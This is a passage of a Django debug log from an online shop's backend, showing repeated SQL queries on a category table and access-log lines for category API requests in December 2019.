06:41:52,728 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:41:52,732 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:41:52,736 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:41:52,742 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:41:52,746 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:41:52,750 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:41:52,754 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:41:52,758 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:41:52,765 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:41:52,769 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:41:52,772 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:41:52,776 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:41:52,780 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:41:52,784 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:41:52,789 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:41:52,793 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:41:52,797 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:41:52,802 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:41:52,806 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:41:52] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:41:54,821 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:41:54,832 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:41:54,838 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:41:54,842 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:41:54,848 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:41:54,852 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:41:54,856 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:41:54,860 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:41:54,864 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:41:54,870 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:41:54,874 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:41:54,877 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:41:54,881 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:41:54,885 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:41:54,891 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:41:54,894 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:41:54,898 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:41:54,902 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:41:54,906 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:41:54,912 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:41:54,916 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:41:54,920 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:41:54,924 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:41:54,927 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:41:54,931 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:41:54,937 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:41:54,941 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:41:54,945 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:41:54,949 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:41:54,953 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:41:54,959 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:41:54,963 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:41:54,966 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:41:54,971 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:41:54,974 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:41:54,981 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:41:54,984 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:41:54,988 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:41:54,992 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:41:54,996 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:41:55,000 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:41:55,006 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:41:55,010 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:41:55,014 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:41:55,019 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:41:55,023 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:41:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:41:55,106 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-20 06:41:55,114 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [20/Dec/2019 06:41:55] "GET /api/v1/categories/10 HTTP/1.0" 200 353 [20/Dec/2019 06:46:34] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:49:01,119 utils 4252 140031732287232 